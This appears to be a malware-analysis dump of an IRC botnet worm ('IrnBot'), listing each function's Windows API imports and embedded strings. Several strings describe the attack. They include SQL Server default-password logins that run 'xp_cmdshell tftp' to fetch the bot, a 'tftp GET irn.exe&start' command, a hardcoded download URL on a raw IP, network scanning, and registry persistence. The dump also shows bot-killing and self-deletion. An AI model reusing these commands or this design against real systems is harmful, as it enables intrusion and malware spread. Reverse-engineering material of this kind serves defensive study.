sub_outside():
NTDLL.RtlFreeHeap
NTDLL.RtlGetLastWin32Error
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
KERNEL32.GetVersionExA
KERNEL32.GetProcAddress
KERNEL32.ExitProcess
|
sub_4106A8(0130):
KERNEL32.GetCPInfo
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
|
sub_40F3FF(0635):
NTDLL.RtlGetLastWin32Error
|
sub_419641(07ab):
KERNEL32.GetVersionExA
"VIS"
"2K3"
"XP"
"2K"
"ME"
"98"
"NT"
"95"
"UNK"
"[OS: Microsoft Windows %s %s (%i.%i bui"...
"%s"
|
sub_4117DB(08d2):
KERNEL32.CreateFileA
"CONOUT$"
|
sub_406214(08e4):
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
|
sub_405616(090a):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcessHeap
KERNEL32.InterlockedIncrement
"KERNEL32.DLL"
|
sub_4198AD(0947):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.GetSystemDirectoryA
SHELL32.ShellExecuteA
"@echo off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
"%s\\tmp-%i%i%i-%c%c%c.bat"
"w"
"%s"
|
sub_41A025(0b81):
WS2_32.send
NTDLL.RtlGetLastWin32Error
|
sub_410957(0c06):
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
NTDLL.RtlGetLastWin32Error
|
sub_48B8AB(0cc3):
KERNEL32.GetModuleHandleA
|
sub_41B981(0e5a):
WS2_32.socket
WS2_32.ntohs
WS2_32.sendto
WS2_32.recvfrom
WS2_32.inet_ntoa
WS2_32.closesocket
"rb"
"¡¡ÉÉ"
"TFTP: Send Complete To %s. %d Total Sen"...
|
sub_418B4D(0f66):
WS2_32.accept
|
sub_41A45D(15eb):
ADVAPI32.RegCloseKey
"SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
"%s\\%s"
"LDM"
"NetDDE"
"EventMessageFile"
|
sub_40F8D4(1716):
KERNEL32.MultiByteToWideChar
USER32.GetProcessWindowStation
USER32.MessageBoxA
"USER32.DLL"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
"GetUserObjectInformationA"
"GetProcessWindowStation"
|
sub_418B86(17c7):
"%x"
|
sub_417ABC(191f):
WS2_32.send
|
sub_41A19C(1b08):
KERNEL32.Thread32First
KERNEL32.OpenThread
KERNEL32.Thread32Next
KERNEL32.CloseHandle
|
sub_41A138(1b08):
KERNEL32.Thread32First
KERNEL32.OpenThread
KERNEL32.Thread32Next
KERNEL32.CloseHandle
|
sub_404E6E(1b24):
KERNEL32.GetCPInfo
|
sub_4031FD(1c1d):
KERNEL32.SetUnhandledExceptionFilter
KERNEL32.GetCurrentProcess
|
sub_4027F4(227c):
"Scanner"
"Scan: All Scan Threads Stopped. %d kill"...
|
sub_40D983(240f):
KERNEL32.WideCharToMultiByte
NTDLL.RtlGetLastWin32Error
|
sub_41A40D(2492):
WS2_32.send
|
sub_405E8D(2585):
NTDLL.RtlAllocateHeap
|
sub_40223C(283c):
WS2_32.inet_addr
WS2_32.gethostbyaddr
"Net: IP: %s Host: N/A"
"Net: IP: %s Host: %s"
|
sub_40E422(2989):
KERNEL32.CreateFileA
NTDLL.RtlGetLastWin32Error
KERNEL32.GetFileType
KERNEL32.CloseHandle
|
sub_41AD77(2b9b):
ADVAPI32.RegCloseKey
"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
"~MHz"
"ProcessorNameString"
"%s"
"%s%c"
"Unknown"
"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
|
sub_417C7B(2ce1):
KERNEL32.GetTickCount
"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
"["
"%s%s|"
"%s%s|"
"%sP|"
"%s0%I64u|"
"%s%I64u|"
"%s%c"
"%s]"
|
sub_402E05(2daa):
NTDLL.RtlSizeHeap
|
sub_417E66(2e07):
" "
"-s"
"/s"
" "
|
sub_419EC1(2f90):
"olTznSALKZkJESmT"
"olTznSALKZkJESmT"
|
sub_40F23E(34be):
NTDLL.RtlLeaveCriticalSection
|
sub_40F76D(364e):
KERNEL32.MultiByteToWideChar
|
sub_48CB6C(3a91):
KERNEL32.GetModuleHandleA
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
|
sub_40A15D(3aac):
NTDLL.RtlGetLastWin32Error
KERNEL32.MultiByteToWideChar
|
sub_419B37(4006):
"192.168.*.*"
"10.*.*.*"
"111.*.*.*"
"15.*.*.*"
"16.*.*.*"
"101.*.*.*"
"110.*.*.*"
"112.*.*.*"
"172.%d.*.*"
|
sub_40B55A(41f6):
KERNEL32.SetUnhandledExceptionFilter
|
sub_411780(4634):
KERNEL32.GetModuleHandleA
"KERNEL32"
"IsProcessorFeaturePresent"
|
sub_410E04(4658):
"e+000"
|
sub_41881F(4738):
WS2_32.socket
WS2_32.closesocket
WS2_32.gethostbyname
WS2_32.ntohs
WS2_32.connect
"ÒÃÑÑ"
"%s %s\r\n"
"%s-%s"
"ÌËÁÉ"
"×ÑÇÐ"
"%s %s\r\n%s %s 0 0 :%s\r\n"
|
sub_41C28D(48ad):
KERNEL32.GetSystemDirectoryA
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.GetVersionExA
WS2_32.WSAStartup
WS2_32.WSACleanup
"--install "
"%s\\%s"
"%s %s%s"
"%s"
"Ï×ÖÇÖÊÇÇÚ"
"RM"
"BK"
"UNM"
|
sub_401DA7(496a):
"http://%s:%d/%s"
|
sub_419E67(4a5c):
"user32.dll"
|
sub_40C6EC(4d78):
KERNEL32.GetStringTypeW
NTDLL.RtlGetLastWin32Error
KERNEL32.MultiByteToWideChar
|
sub_4028D4(4e0b):
"Statistics: Exploits:"
"%s %s: %d"
"%s; Daemons:"
"%s TFTP: %d"
"%s HTTP: %d"
|
sub_40858C(4f5e):
NTDLL.RtlLeaveCriticalSection
|
sub_40853A(4f5e):
NTDLL.RtlEnterCriticalSection
|
sub_417776(50c0):
KERNEL32.GetSystemDirectoryA
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_4022D6(51c2):
"Scan: Unknown Exploit."
"*.*.*.*"
"-a"
"-b"
"-c"
"Scan: Not Enough Threads. %d Available."...
"%d.%d.%d.%d"
"x."
"%d."
"%s%d."
"%sx."
"%sx"
"%s%d"
"%d.%d.%d.%d"
"%d.%d.%d.x"
"%d.%d.x.x"
"%d.x.x.x"
"Scan: %s:%d Using %d Threads."
"Scanner"
|
sub_40207A(56d8):
KERNEL32.GetSystemDirectoryA
"System: %s [CPU: %i x %s @ %dMhz] [RAM:"...
|
sub_405311(5886):
KERNEL32.InterlockedIncrement
|
sub_40AA2F(58d9):
"pow"
"exp"
"exp"
"log10"
"log10"
"log"
"log"
"pow"
"pow"
"exp10"
|
sub_405C7A(5be9):
KERNEL32.GetProcessHeap
|
sub_414446(5e10):
WS2_32.select
WS2_32.recv
WS2_32.socket
WS2_32.connect
WS2_32.send
WS2_32.closesocket
KERNEL32.GetCurrentThreadId
|
sub_417B51(5fcf):
WS2_32.send
"ÒÐËÔÏÑÅ"
"%s %s %s\r\n"
|
sub_41A0C2(608f):
KERNEL32.ReadProcessMemory
|
sub_41B751(6107):
WS2_32.inet_ntoa
"sa"
"root"
"admin"
"DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
"EXEC master..xp_cmdshell 'tftp -i %s GE"...
"%s: Exploited %s."
|
sub_401C1D(6279):
"QUIT :Irn Powered\r\n"
|
sub_41BED6(64a5):
WININET.InternetOpenA
WININET.InternetOpenUrlA
KERNEL32.CreateFileA
KERNEL32.GetTickCount
WININET.InternetReadFile
KERNEL32.WriteFile
KERNEL32.CloseHandle
SHELL32.ShellExecuteA
KERNEL32.GetCurrentThreadId
"Mozilla/5.0"
"DL: Downloading %s to %s"
"DL: Download %s (%i Bytes) finished in "...
"Main: Uninstalling Drone"
"DL: Failed; Bad Location."
"DL: Failed To Update"
"DL: Error Executing File."
"DL: Executed File: %s"
"DL: Failed; Bad URL"
"DL: Failed; WinINET Error"
|
sub_410B0B(65eb):
NTDLL.RtlGetLastWin32Error
|
sub_4881C3(67ef):
KERNEL32.ExitProcess
|
sub_40F260(68c8):
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
|
sub_40E07F(696b):
"U–Š"
|
sub_4085AF(6a78):
"ccs="
"UTF-8"
"UTF-16LE"
"UNICODE"
|
sub_407C31(6b26):
KERNEL32.GetModuleHandleA
"mscoree.dll"
"CorExitProcess"
|
sub_4016BA(6c31):
"list too long"
|
sub_40121E(6c31):
"list too long"
|
sub_4055AF(6d13):
KERNEL32.TlsGetValue
KERNEL32.TlsSetValue
|
sub_419C67(6d5f):
"Registry Monitor"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
|
sub_404DF4(705a):
KERNEL32.GetACP
|
sub_41088C(71e5):
NTDLL.RtlGetLastWin32Error
KERNEL32.WideCharToMultiByte
|
sub_40CEC4(7249):
KERNEL32.GetModuleHandleA
KERNEL32.MultiByteToWideChar
NTDLL.RtlSetLastWin32Error
"kernel32.dll"
"InitializeCriticalSectionAndSpinCount"
|
sub_418CAF(726a):
"\r\n"
" "
" "
" "
"\r\n\r\n"
|
sub_404A3E(7a5e):
KERNEL32.SetUnhandledExceptionFilter
KERNEL32.GetCurrentProcess
|
sub_41A28F(7c37):
ADVAPI32.RegCloseKey
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_402A79(7f6b):
"invalid string position"
|
sub_414337(7fe8):
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.recv
WS2_32.send
|
sub_419590(824c):
KERNEL32.QueryPerformanceCounter
|
sub_41ACC3(8359):
WS2_32.ntohs
WS2_32.socket
WS2_32.connect
WS2_32.closesocket
WS2_32.send
|
sub_40D06E(83d5):
NTDLL.RtlGetLastWin32Error
|
sub_401E4A(85c4):
"S4:Already Running"
|
sub_48CC25(8677):
USER32.MessageBoxA
KERNEL32.ExitProcess
|
sub_404BC6(87b5):
KERNEL32.GetCPInfo
|
sub_413D2C(8861):
WS2_32.socket
WS2_32.ntohs
WS2_32.ioctlsocket
WS2_32.connect
WS2_32.select
WS2_32.closesocket
|
sub_4197B6(88b5):
WS2_32.getsockname
"%d.%d.%d.%d"
|
sub_41764F(8b9b):
ADVAPI32.RegCloseKey
|
sub_418A8C(8bd0):
"ÌËÁÉ"
"%s %s\r\n"
|
sub_405397(9237):
KERNEL32.InterlockedDecrement
|
sub_41802D(93dd):
"%s"
" :"
"%s"
" "
"%s"
" "
"ÒËÌÅ"
"ÉËÁÉ"
"ÒÐËÔÏÑÅ"
"ÒÍÌÅ"
"%s %s\r\n"
"¡¡ÉÉ"
"ÈÍËÌ"
"%s %s %s\r\n"
"001"
"ÈÍËÌ"
"ÏÍÆÇ"
"¡¡ÉÉ"
"%s %s %s\r\n%s %s %s\r\n"
"332"
" :"
"%s"
"!"
"%s"
"332"
"%s"
"%s"
"%s"
";"
";"
";"
|
sub_41930F(9941):
KERNEL32.GetSystemDirectoryA
WS2_32.socket
WS2_32.closesocket
WS2_32.ntohs
WS2_32.bind
WS2_32.WSAAsyncSelect
WS2_32.listen
"%s\\%s"
|
sub_4176BD(9e8f):
ADVAPI32.RegCloseKey
|
sub_401D0C(a01a):
"JOIN %s %s\r\n"
"JOIN %s\r\n"
"I: Insufficient Arguments."
|
sub_419F50(a203):
KERNEL32.GetTickCount
WS2_32.send
NTDLL.RtlGetLastWin32Error
|
sub_40D20A(a83e):
KERNEL32.WideCharToMultiByte
KERNEL32.WriteFile
NTDLL.RtlGetLastWin32Error
|
sub_41BB83(a924):
WS2_32.socket
WS2_32.setsockopt
WS2_32.ntohs
WS2_32.bind
WS2_32.closesocket
WS2_32.select
WS2_32.recvfrom
|
sub_405886(a9bf):
KERNEL32.GetModuleHandleA
KERNEL32.TlsGetValue
KERNEL32.TlsAlloc
KERNEL32.TlsSetValue
KERNEL32.GetCurrentThreadId
"KERNEL32.DLL"
"FlsGetValue"
"FlsSetValue"
"FlsFree"
|
sub_41A690(aba5):
KERNEL32.GetCurrentProcessId
KERNEL32.GetModuleHandleA
WS2_32.send
KERNEL32.GetSystemDirectoryA
KERNEL32.CreateToolhelp32Snapshot
KERNEL32.Process32First
NTDLL.RtlGetLastWin32Error
KERNEL32.CloseHandle
KERNEL32.OpenProcess
KERNEL32.ReadProcessMemory
KERNEL32.Process32Next
KERNEL32.GetCurrentThreadId
"OpenThread"
"kernel32.dll"
"OpenProcess"
"kernel32.dll"
"CreateToolhelp32Snapshot"
"kernel32.dll"
"Process32First"
"kernel32.dll"
"kernel32.dll"
"kernel32.dll"
"Module32Next"
"kernel32.dll"
"kernel32.dll"
"Thread32Next"
"kernel32.dll"
"ReadProcessMemory"
"kernel32.dll"
"GetModuleFileNameExA"
"psapi.dll"
"%s\\%s"
"SeDebugPrivilege"
"SeDebugPrivilege"
"System"
"¡¡ÉÉ"
"Bot Killed: %s"
|
sub_403AA0(ad53):
NTDLL.RtlAllocateHeap
|
sub_40B539(add8):
KERNEL32.SetUnhandledExceptionFilter
|
sub_419507(aecd):
"HS"
|
sub_40B203(b143):
KERNEL32.GetModuleFileNameA
"C:\\m_unpacker\\packed.exe"
|
sub_418D42(b570):
WS2_32.recv
WS2_32.send
KERNEL32.CreateFileA
WS2_32.getpeername
WS2_32.gethostbyaddr
WS2_32.closesocket
"GET"
"Que?"
"HTTP/1.1 501 Not Implemented\r\nContent-L"...
"%s\\%s\\%s"
"%s\\%s\\%s%s"
"%s\\%s"
"Que?"
"Que?"
"HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
"¡¡ÉÉ"
"HTTP: Transfer: %d.%d.%d.%d (N/A). %d T"...
"HTTP: Transfer: %d.%d.%d.%d (%s). %d To"...
|
sub_40E0D9(b6f8):
"U–Š"
"U–Š"
|
sub_419DDC(b9ea):
KERNEL32.GetCurrentProcess
KERNEL32.VirtualAllocEx
KERNEL32.VirtualProtectEx
WS2_32.send
KERNEL32.VirtualFreeEx
|
sub_405DA7(c36e):
NTDLL.RtlEnterCriticalSection
|
sub_40B439(c391):
KERNEL32.GetCurrentProcessId
KERNEL32.GetCurrentThreadId
KERNEL32.GetTickCount
KERNEL32.QueryPerformanceCounter
|
sub_419430(c642):
WS2_32.recv
"IrnBot"
|
sub_405CCF(c70d):
NTDLL.RtlLeaveCriticalSection
|
sub_401D67(c802):
"PART %s\r\n"
"I: Insufficient Arguments."
|
sub_408B90(ca1e):
KERNEL32.GetFileType
KERNEL32.GetStdHandle
KERNEL32.SetHandleCount
|
sub_409E64(cd6e):
KERNEL32.GetModuleFileNameA
KERNEL32.GetStdHandle
KERNEL32.WriteFile
"Runtime Error!\n\nProgram: "
""
"..."
"\n\n"
"Microsoft Visual C++ Runtime Library"
|
sub_40B2BC(ced3):
KERNEL32.GetEnvironmentStringsW
NTDLL.RtlGetLastWin32Error
KERNEL32.WideCharToMultiByte
KERNEL32.FreeEnvironmentStringsW
|
sub_404D50(d02f):
KERNEL32.InterlockedDecrement
KERNEL32.InterlockedIncrement
|
sub_40DCFF(d327):
NTDLL.RtlAllocateHeap
|
sub_4145BE(d3bd):
WS2_32.socket
WS2_32.ntohs
WS2_32.bind
WS2_32.listen
KERNEL32.GetCurrentThreadId
WS2_32.accept
"S4: bind() Error"
"S4: %s:%i"
"SC"
|
sub_40855D(d432):
NTDLL.RtlLeaveCriticalSection
|
sub_40850B(d432):
NTDLL.RtlEnterCriticalSection
|
sub_40C307(d5b0):
KERNEL32.LCMapStringW
NTDLL.RtlGetLastWin32Error
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
|
sub_405019(d858):
KERNEL32.InterlockedDecrement
KERNEL32.InterlockedIncrement
|
sub_41BD26(dd03):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
"TFTP Server"
|
sub_40F19E(e051):
NTDLL.RtlEnterCriticalSection
|
sub_405765(e07f):
KERNEL32.InterlockedDecrement
|
sub_4117FA(e22c):
KERNEL32.CloseHandle
|
sub_4019F3(e2f5):
"¶·±³·³ÁÇ´´·Ç»Ç¶Ä±ÇºÀÁ¶Ä¶³Á¶À°ÆƵµ°ÄǺ±°"...
"UPD: Auth Failure."
"UPD: Invalid Arguments."
|
sub_40DE1D(e37e):
NTDLL.RtlAllocateHeap
|
sub_412E61(e396):
"1#SNAN"
"1#IND"
"1#INF"
"1#QNAN"
|
sub_4054D7(e3a2):
KERNEL32.TlsGetValue
KERNEL32.GetModuleHandleA
"KERNEL32.DLL"
|
sub_405543(e3a2):
KERNEL32.TlsGetValue
KERNEL32.GetModuleHandleA
"KERNEL32.DLL"
|
sub_405E33(e479):
KERNEL32.HeapCreate
|
sub_408851(e48e):
NTDLL.RtlEnterCriticalSection
|
sub_417909(e4c8):
KERNEL32.GetSystemDirectoryA
"%s\\%s"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_41C135(e4d4):
"http://217.67.229.212/phpbb/uploads/jpb"...
"C:\\jpb.exe"
"DL"
|
sub_41AFA7(e56c):
WS2_32.inet_ntoa
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.GetTickCount
NTDLL.RtlGetLastWin32Error
KERNEL32.CloseHandle
"."
"\\\\%s\\ipc$"
"\\\\%s\\pipe\\browser"
"http://%s:%d/%s"
"http://%s:%d/%s"
"%s: Exploited: %s."
|
sub_41A200(e5e3):
KERNEL32.CreateToolhelp32Snapshot
KERNEL32.Module32First
KERNEL32.Module32Next
KERNEL32.CloseHandle
|
sub_41056E(e6d5):
KERNEL32.SetUnhandledExceptionFilter
|
sub_41AB81(ead5):
WS2_32.ntohs
WS2_32.socket
WS2_32.closesocket
WS2_32.connect
WS2_32.recv
WS2_32.send
"tftp -i %s GET irn.exe&start irn.exe&ex"...
|
sub_401FD7(ed2d):
WS2_32.closesocket
"S4: Thread Stopped"
"S4: No Thread Running"
|
sub_4055A6(ef17):
KERNEL32.TlsAlloc
|
sub_4186F1(ef3c):
WS2_32.recv
WS2_32.closesocket
"\r\n"
"%s"
"\r\n"
|
sub_4056CA(efa1):
NTDLL.RtlGetLastWin32Error
KERNEL32.TlsGetValue
KERNEL32.GetCurrentThreadId
NTDLL.RtlSetLastWin32Error
|
sub_41BDAA(f270):
"%s"
"%s%X"
|
sub_40177B(f394):
"ÃÄÃÄ´Ç·À±¶··´À´¶Æ³À·°¶º°Çµ´³Ã¶º³µ´ÃóÁ´"...
"DL: Auth Failure."
"DL: Invalid Arguments"
|
sub_417722(f3a8):
ADVAPI32.RegCloseKey
ADVAPI32.RegDeleteValueA
|
sub_41755C(f44a):
KERNEL32.WriteFile
|
sub_405F00(f7b2):
KERNEL32.TlsSetValue
NTDLL.RtlFreeHeap
|
sub_408DFD(fb55):
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
|